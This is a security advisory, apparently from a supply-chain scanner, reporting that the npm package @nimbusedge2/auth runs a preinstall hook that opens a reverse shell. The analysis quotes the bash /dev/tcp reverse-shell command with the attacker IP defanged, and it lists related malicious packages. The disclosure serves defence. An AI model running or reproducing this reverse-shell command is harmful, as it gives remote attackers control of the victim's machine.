@nimbusedge2/auth@1.1.1
Malicious code in @nimbusedge2/auth (npm)
T1059.004 · Unix ShellT1071.001 · Web Protocols
Analysis
The package's preinstall hook opens a reverse shell to 147[.]93[.]157[.]202:8080 using `bash -i >& /dev/tcp/147[.]93[.]157[.]202/8080 0>&1` and pipes the interactive shell's output to hxxp://canarytokens[.]com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact[.]php via a POST. Installing the package hands the remote host an interactive shell on the installer's machine. The package contains no other code.
- analyzed by
- Leitwacht
- first seen
- Sep 20, 2026, 07:48 PM
- analyzed
- Sep 20, 2026, 07:48 PM
Related advisories
- @nimbusedge2/xa@1.1.0
- @nimbusedge2/x@1.1.1
- @nimbusedge2/authxsas1@1.1.0
- strapi-plugin-feedmeeb@3.6.8
- strapi-plugin-persh-meeb@3.6.8
- strapi-plugin-ccrec-meeb@3.6.8
- strapi-plugin-ccresh-meeb@3.6.8
- strapi-plugin-revs02-meeb322k@3.6.8
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.